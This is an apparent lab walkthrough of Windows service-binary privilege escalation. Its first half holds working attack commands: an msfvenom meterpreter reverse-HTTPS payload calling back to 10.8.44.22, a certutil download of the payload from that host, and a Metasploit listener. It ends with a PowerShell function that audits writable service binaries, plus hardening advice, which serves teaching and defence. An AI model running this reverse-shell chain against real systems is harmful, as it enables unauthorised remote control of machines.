In this section, we will exploit insecure services.

Now, let's start by querying the service configuration.

sc qc filepermsvc


Now, let's check the permissions on the service's binary path.

accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"


Notice that we have full access to this file.

Now, let's start our exploitation phase.

Let's create a new payload with msfvenom.

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.8.44.22 LPORT=444 -f exe -o administrator.exe


Now, let's transfer it to the victim machine.

certutil -urlcache -f http://10.8.44.22/administrator.exe administrator.exe


Now, on the attacker machine, let's open a listener.

set payload windows/x64/meterpreter/reverse_https
set lhost tun0
set lport 444
exploit
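
The condition this walkthrough depends on, a service binary that non-administrators can write to, can be audited across a whole host. The following PowerShell is an added example, not part of the original walkthrough; the function name Get-WritableServiceBinary and the list of low-privileged SIDs are assumptions chosen for the example.

```powershell
# Added example: list service binaries that low-privileged groups can modify.
# The function name and the default SID list are choices made for this example.
function Get-WritableServiceBinary {
    param(
        # Well-known SIDs: Everyone, BUILTIN\Users, Authenticated Users, INTERACTIVE
        [string[]]$LowPrivSid = @('S-1-1-0', 'S-1-5-32-545', 'S-1-5-11', 'S-1-5-4')
    )
    # Rights that let a principal replace or rewrite the file, plus the
    # GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) bits.
    $rights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
    $mask = [int]$rights -bor 0x40000000 -bor 0x10000000
    $sidType = [System.Security.Principal.SecurityIdentifier]

    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        # PathName is either "C:\quoted path\svc.exe" args or C:\unquoted\svc.exe args
        if ($svc.PathName -match '^\s*"([^"]+)"' -or $svc.PathName -match '^\s*(.+?\.exe)') {
            $exe = $Matches[1]
        } else { continue }
        if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }

        $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
        if (-not $acl) { continue }

        # Request SIDs instead of account names so the check is locale-independent
        foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivSid -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band $mask) -eq 0) { continue }
            [pscustomobject]@{
                Service = $svc.Name
                RunsAs  = $svc.StartName
                Path    = $exe
                Sid     = $ace.IdentityReference.Value
                Rights  = $ace.FileSystemRights
            }
        }
    }
}

Get-WritableServiceBinary | Format-Table -AutoSize -Wrap
```

Any row whose RunsAs account is more privileged than the listed SID marks a binary whose ACL should be tightened so that only administrators and SYSTEM can modify it.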